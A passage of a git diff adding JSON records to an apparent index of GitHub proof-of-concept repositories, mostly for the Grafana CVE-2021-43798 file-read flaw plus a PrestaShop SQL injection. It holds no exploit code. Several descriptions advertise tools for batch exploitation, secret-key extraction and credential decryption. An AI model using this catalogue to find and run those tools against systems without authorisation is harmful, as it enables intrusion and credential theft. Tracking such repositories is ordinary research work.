"https:\/\/github.com\/c0n5n3d\/CVE-2021-43657", + "description": "This is a reference\/POC for CVE-2021-43657", + "fork": false, + "created_at": "2022-11-08T02:13:29Z", + "updated_at": "2024-01-17T06:36:25Z", + "pushed_at": "2022-11-26T08:09:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43778.json b/2021/CVE-2021-43778.json new file mode 100644 index 0000000000..d3017f0ba7 --- /dev/null +++ b/2021/CVE-2021-43778.json @@ -0,0 +1,33 @@ +[ + { + "id": 433348602, + "name": "CVE-2021-43778", + "full_name": "AK-blank\/CVE-2021-43778", + "owner": { + "login": "AK-blank", + "id": 56591429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4", + "html_url": "https:\/\/github.com\/AK-blank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-43778", + "description": " CVE-2021-43778 poc", + "fork": false, + "created_at": "2021-11-30T08:19:24Z", + "updated_at": "2021-12-03T00:25:20Z", + "pushed_at": "2021-11-30T08:20:43Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43789.json b/2021/CVE-2021-43789.json new file mode 100644 index 0000000000..3ad3d2fd44 --- /dev/null +++ b/2021/CVE-2021-43789.json @@ -0,0 +1,33 @@ +[ + { + "id": 452890200, + "name": "CVE-2021-43789", + "full_name": "numanturle\/CVE-2021-43789", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2021-43789", + "description": "Prestashop >= 1.7.5.0 < 1.7.8.2 - SQL injection", + "fork": false, + "created_at": "2022-01-28T00:26:40Z", + "updated_at": "2024-03-23T06:01:36Z", + "pushed_at": "2022-01-28T00:27:12Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43798.json b/2021/CVE-2021-43798.json new file mode 100644 index 0000000000..943852ab8f --- /dev/null +++ b/2021/CVE-2021-43798.json @@ -0,0 +1,1259 @@ +[ + { + "id": 435633141, + "name": "CVE-2021-43798", + "full_name": "taythebot\/CVE-2021-43798", + "owner": { + "login": "taythebot", + "id": 60461479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60461479?v=4", + "html_url": "https:\/\/github.com\/taythebot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taythebot\/CVE-2021-43798", + "description": "CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)", + "fork": false, + "created_at": "2021-12-06T20:10:23Z", + "updated_at": "2024-11-18T19:09:55Z", + "pushed_at": "2021-12-07T18:09:20Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 435809070, + "name": "CVE-2021-43798", + "full_name": "zer0yu\/CVE-2021-43798", + "owner": { + "login": "zer0yu", + "id": 16551733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16551733?v=4", + "html_url": "https:\/\/github.com\/zer0yu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0yu\/CVE-2021-43798", + "description": "Grafana Arbitrary File Reading Vulnerability", + "fork": false, + "created_at": "2021-12-07T08:59:11Z", + "updated_at": "2024-03-25T16:55:01Z", + "pushed_at": "2021-12-07T14:18:42Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 27, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 435810052, + "name": "Grafana-CVE-2021-43798", + "full_name": "jas502n\/Grafana-CVE-2021-43798", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/Grafana-CVE-2021-43798", + "description": "Grafana Unauthorized arbitrary file reading vulnerability", + "fork": false, + "created_at": "2021-12-07T09:02:16Z", + "updated_at": "2024-11-26T14:34:23Z", + "pushed_at": "2023-02-14T07:05:22Z", + "stargazers_count": 355, + "watchers_count": 355, + "has_discussions": false, + "forks_count": 89, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 89, + "watchers": 355, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 435840491, + "name": "CVE-2021-43798-Grafana-POC", + "full_name": "ScorpionsMAX\/CVE-2021-43798-Grafana-POC", + "owner": { + "login": "ScorpionsMAX", + "id": 95686853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95686853?v=4", + "html_url": "https:\/\/github.com\/ScorpionsMAX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ScorpionsMAX\/CVE-2021-43798-Grafana-POC", + "description": "CVE-2021-43798 Grafana 任意文件读取漏洞 POC+参数", + "fork": false, + "created_at": "2021-12-07T10:43:30Z", + "updated_at": "2022-09-22T13:45:05Z", + "pushed_at": "2021-12-17T02:57:41Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435877595, + "name": "CVE-2021-43798", + "full_name": "Mr-xn\/CVE-2021-43798", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2021-43798", + "description": "CVE-2021-43798:Grafana 任意文件读取漏洞", + "fork": false, + "created_at": "2021-12-07T12:47:58Z", + "updated_at": "2024-08-12T20:18:39Z", + "pushed_at": "2021-12-07T16:27:56Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43798", + "grafana", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 25, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 435904073, + "name": "CVE-2021-43798-Grafana-Exp", + "full_name": "asaotomo\/CVE-2021-43798-Grafana-Exp", + "owner": { + "login": "asaotomo", + "id": 67818638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67818638?v=4", + "html_url": "https:\/\/github.com\/asaotomo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asaotomo\/CVE-2021-43798-Grafana-Exp", + "description": "Grafanav8.*版本任意文件读取漏洞批量检测工具:该漏洞目前为0day漏洞,未授权的攻击者利用该漏洞,能够获取服务器敏感文件。", + "fork": false, + "created_at": "2021-12-07T14:06:26Z", + "updated_at": "2024-05-11T05:59:13Z", + "pushed_at": "2021-12-23T15:51:01Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": true, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43798", + "exp", + "grafana" + ], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435926848, + "name": "grafanaExp", + "full_name": "A-D-Team\/grafanaExp", + "owner": { + "login": "A-D-Team", + "id": 94842031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94842031?v=4", + "html_url": "https:\/\/github.com\/A-D-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A-D-Team\/grafanaExp", + "description": "A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins \/ extract secret_key \/ decrypt data_source info automatic.", + "fork": false, + "created_at": "2021-12-07T15:11:34Z", + "updated_at": "2024-11-26T11:52:47Z", + "pushed_at": "2024-07-12T14:17:27Z", + "stargazers_count": 244, + "watchers_count": 244, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43798", + "exploit", + "grafana" + ], + "visibility": "public", + "forks": 36, + "watchers": 244, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 435955349, + "name": "grafanaExp", + "full_name": "kenuosec\/grafanaExp", + "owner": { + "login": "kenuosec", + "id": 77450225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77450225?v=4", + "html_url": "https:\/\/github.com\/kenuosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kenuosec\/grafanaExp", + "description": "利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。", + "fork": false, + "created_at": "2021-12-07T16:39:09Z", + "updated_at": "2023-12-27T07:46:41Z", + "pushed_at": "2021-12-07T15:57:04Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 436106864, + "name": "CVE-2021-43798-grafana_fileread", + "full_name": "M0ge\/CVE-2021-43798-grafana_fileread", + "owner": { + "login": "M0ge", + "id": 62680449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62680449?v=4", + "html_url": "https:\/\/github.com\/M0ge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0ge\/CVE-2021-43798-grafana_fileread", + "description": "grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL", + "fork": false, + "created_at": "2021-12-08T03:43:31Z", + "updated_at": "2023-05-22T09:15:44Z", + "pushed_at": "2022-01-27T08:35:29Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436149953, + "name": "Grafana-CVE-2021-43798", + "full_name": "JiuBanSec\/Grafana-CVE-2021-43798", + "owner": { + "login": "JiuBanSec", + "id": 57030243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57030243?v=4", + "html_url": "https:\/\/github.com\/JiuBanSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JiuBanSec\/Grafana-CVE-2021-43798", + "description": "Grafana File-Read Vuln", + "fork": false, + "created_at": "2021-12-08T07:06:58Z", + "updated_at": "2021-12-13T11:43:48Z", + "pushed_at": "2021-12-13T11:52:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436150384, + "name": "CVE-2021-43798-Grafana-File-Read", + "full_name": "lfz97\/CVE-2021-43798-Grafana-File-Read", + "owner": { + "login": "lfz97", + "id": 75104414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75104414?v=4", + "html_url": "https:\/\/github.com\/lfz97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfz97\/CVE-2021-43798-Grafana-File-Read", + "description": "CVE-2021-43798-Grafana任意文件读取漏洞", + "fork": false, + "created_at": "2021-12-08T07:08:37Z", + "updated_at": "2022-09-22T13:45:23Z", + "pushed_at": "2021-12-09T02:13:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436272467, + "name": "CVE-2021-43798", + "full_name": "s1gh\/CVE-2021-43798", + "owner": { + "login": "s1gh", + "id": 699943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/699943?v=4", + "html_url": "https:\/\/github.com\/s1gh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1gh\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2021-12-08T14:14:38Z", + "updated_at": "2022-11-16T06:58:34Z", + "pushed_at": "2021-12-15T18:56:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 436562240, + "name": "CVE-2021-43798", + "full_name": "z3n70\/CVE-2021-43798", + "owner": { + "login": "z3n70", + "id": 39817707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4", + "html_url": "https:\/\/github.com\/z3n70", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3n70\/CVE-2021-43798", + "description": "Simple program for exploit grafana", + "fork": false, + "created_at": "2021-12-09T09:48:40Z", + "updated_at": "2024-08-12T20:18:42Z", + "pushed_at": "2021-12-09T10:10:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cybersecurity", + "exploit", + "grafana", + "pentesting" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436563698, + "name": "Grafana_POC-CVE-2021-43798", + "full_name": "Mo0ns\/Grafana_POC-CVE-2021-43798", + "owner": { + "login": "Mo0ns", + "id": 62552076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62552076?v=4", + "html_url": "https:\/\/github.com\/Mo0ns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mo0ns\/Grafana_POC-CVE-2021-43798", + "description": "Grafana-POC任意文件读取漏洞(CVE-2021-43798)", + "fork": false, + "created_at": "2021-12-09T09:53:25Z", + "updated_at": "2023-10-20T03:51:14Z", + "pushed_at": "2021-12-09T09:56:29Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436590562, + "name": "Grafana-CVE-2021-43798Exp", + "full_name": "fanygit\/Grafana-CVE-2021-43798Exp", + "owner": { + "login": "fanygit", + "id": 42337082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42337082?v=4", + "html_url": "https:\/\/github.com\/fanygit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fanygit\/Grafana-CVE-2021-43798Exp", + "description": "CVE-2021-43798Exp多线程批量验证脚本", + "fork": false, + "created_at": "2021-12-09T11:25:47Z", + "updated_at": "2021-12-16T03:37:48Z", + "pushed_at": "2021-12-16T03:37:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 437331756, + "name": "CVE-2021-43798", + "full_name": "LongWayHomie\/CVE-2021-43798", + "owner": { + "login": "LongWayHomie", + "id": 63229183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4", + "html_url": "https:\/\/github.com\/LongWayHomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2021-43798", + "description": "CVE-2021-43798 is a vulnerability marked as High priority (CVSS 7.5) leading to arbitrary file read via installed plugins in Grafana application.", + "fork": false, + "created_at": "2021-12-11T16:24:58Z", + "updated_at": "2022-03-01T12:41:16Z", + "pushed_at": "2021-12-22T00:25:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437363274, + "name": "exploit-grafana-CVE-2021-43798", + "full_name": "pedrohavay\/exploit-grafana-CVE-2021-43798", + "owner": { + "login": "pedrohavay", + "id": 18234370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18234370?v=4", + "html_url": "https:\/\/github.com\/pedrohavay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pedrohavay\/exploit-grafana-CVE-2021-43798", + "description": "This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).", + "fork": false, + "created_at": "2021-12-11T18:49:30Z", + "updated_at": "2024-10-08T03:02:14Z", + "pushed_at": "2021-12-11T19:10:03Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 39, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 437579874, + "name": "CVE-2021-43798", + "full_name": "gixxyboy\/CVE-2021-43798", + "owner": { + "login": "gixxyboy", + "id": 43948762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43948762?v=4", + "html_url": "https:\/\/github.com\/gixxyboy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gixxyboy\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2021-12-12T15:16:55Z", + "updated_at": "2021-12-12T15:16:59Z", + "pushed_at": "2021-12-12T15:16:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438335194, + "name": "CVE-2021-43798", + "full_name": "Ryze-T\/CVE-2021-43798", + "owner": { + "login": "Ryze-T", + "id": 76553352, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76553352?v=4", + "html_url": "https:\/\/github.com\/Ryze-T", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ryze-T\/CVE-2021-43798", + "description": "Grafana8.x 任意文件读取", + "fork": false, + "created_at": "2021-12-14T17:05:41Z", + "updated_at": "2024-05-15T02:03:20Z", + "pushed_at": "2021-12-15T02:53:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439241226, + "name": "CVE-2021-43798-Grafana", + "full_name": "k3rwin\/CVE-2021-43798-Grafana", + "owner": { + "login": "k3rwin", + "id": 59213152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59213152?v=4", + "html_url": "https:\/\/github.com\/k3rwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3rwin\/CVE-2021-43798-Grafana", + "description": "CVE-2021-43798 Grafana任意文件读取", + "fork": false, + "created_at": "2021-12-17T07:03:32Z", + "updated_at": "2022-03-13T10:04:41Z", + "pushed_at": "2022-03-16T04:33:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440470889, + "name": "CVE-2021-43798", + "full_name": "gps1949\/CVE-2021-43798", + "owner": { + "login": "gps1949", + "id": 62601891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62601891?v=4", + "html_url": "https:\/\/github.com\/gps1949", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gps1949\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2021-12-21T10:04:41Z", + "updated_at": "2021-12-21T10:09:58Z", + "pushed_at": "2021-12-21T10:09:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 440638073, + "name": "grafana-CVE-2021-43798", + "full_name": "halencarjunior\/grafana-CVE-2021-43798", + "owner": { + "login": "halencarjunior", + "id": 403088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/403088?v=4", + "html_url": "https:\/\/github.com\/halencarjunior", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halencarjunior\/grafana-CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2021-12-21T20:08:22Z", + "updated_at": "2021-12-21T23:41:01Z", + "pushed_at": "2021-12-21T23:40:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 449447091, + "name": "CVE-2021-43798_exploit", + "full_name": "aymenbouferroum\/CVE-2021-43798_exploit", + "owner": { + "login": "aymenbouferroum", + "id": 63649732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63649732?v=4", + "html_url": "https:\/\/github.com\/aymenbouferroum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aymenbouferroum\/CVE-2021-43798_exploit", + "description": null, + "fork": false, + "created_at": "2022-01-18T21:04:39Z", + "updated_at": "2022-01-18T21:05:05Z", + "pushed_at": "2022-01-22T22:15:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 463472397, + "name": "GrafanaDirInclusion", + "full_name": "Jroo1053\/GrafanaDirInclusion", + "owner": { + "login": "Jroo1053", + "id": 38885991, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38885991?v=4", + "html_url": "https:\/\/github.com\/Jroo1053", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jroo1053\/GrafanaDirInclusion", + "description": "Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798).", + "fork": false, + "created_at": "2022-02-25T09:26:40Z", + "updated_at": "2022-09-27T15:55:16Z", + "pushed_at": "2022-09-13T14:20:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465654847, + "name": "grafana-cve-2021-43798", + "full_name": "yasindce1998\/grafana-cve-2021-43798", + "owner": { + "login": "yasindce1998", + "id": 36514300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36514300?v=4", + "html_url": "https:\/\/github.com\/yasindce1998", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yasindce1998\/grafana-cve-2021-43798", + "description": "This repository contains files for reproducing the vulnerability.", + "fork": false, + "created_at": "2022-03-03T09:37:46Z", + "updated_at": "2023-12-06T11:05:55Z", + "pushed_at": "2022-03-03T09:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 547929236, + "name": "CVE-2021-43798", + "full_name": "hupe1980\/CVE-2021-43798", + "owner": { + "login": "hupe1980", + "id": 24973437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hupe1980\/CVE-2021-43798", + "description": "Grafana - Directory Traversal and Arbitrary File Read", + "fork": false, + "created_at": "2022-10-08T15:31:19Z", + "updated_at": "2023-04-24T23:10:49Z", + "pushed_at": "2022-10-08T16:31:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43798", + "grafana" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 586744953, + "name": "CVE-2021-43798", + "full_name": "G01d3nW01f\/CVE-2021-43798", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2023-01-09T05:53:30Z", + "updated_at": "2023-01-11T14:55:38Z", + "pushed_at": "2023-01-09T06:00:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594377929, + "name": "LabAutomationCVE-2021-43798", + "full_name": "mauricelambert\/LabAutomationCVE-2021-43798", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/LabAutomationCVE-2021-43798", + "description": "This script implements a lab automation where I exploit CVE-2021-43798 to steal user secrets and then gain privileges on a Linux system.", + "fork": false, + "created_at": "2023-01-28T11:12:22Z", + "updated_at": "2023-01-29T20:01:43Z", + "pushed_at": "2023-01-28T11:24:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "cve-2021-43798", + "exploit", + "hacking", + "lab", + "methodology", + "pentest", + "privilege-escalation", + "secrets" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 639713771, + "name": "GrafanaDirectoryScanner", + "full_name": "FAOG99\/GrafanaDirectoryScanner", + "owner": { + "login": "FAOG99", + "id": 92898049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92898049?v=4", + "html_url": "https:\/\/github.com\/FAOG99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FAOG99\/GrafanaDirectoryScanner", + "description": "Exploit for grafana CVE-2021-43798", + "fork": false, + "created_at": "2023-05-12T04:10:09Z", + "updated_at": "2023-05-15T02:37:14Z", + "pushed_at": "2023-05-12T17:37:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686520503, + "name": "grafana-exploit-CVE-2021-43798", + "full_name": "victorhorowitz\/grafana-exploit-CVE-2021-43798", + "owner": { + "login": "victorhorowitz", + "id": 110938606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110938606?v=4", + "html_url": "https:\/\/github.com\/victorhorowitz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/victorhorowitz\/grafana-exploit-CVE-2021-43798", + "description": null, + "fork": false, + "created_at": "2023-09-03T04:11:39Z", + "updated_at": "2023-09-03T04:56:01Z", + "pushed_at": "2023-09-03T04:59:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 710352369, + "name": "CVE-2021-43798", + "full_name": "katseyres2\/CVE-2021-43798", + "owner": { + "login": "katseyres2", + "id": 143514320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143514320?v=4", + "html_url": "https:\/\/github.com\/katseyres2", + "user_view_type": 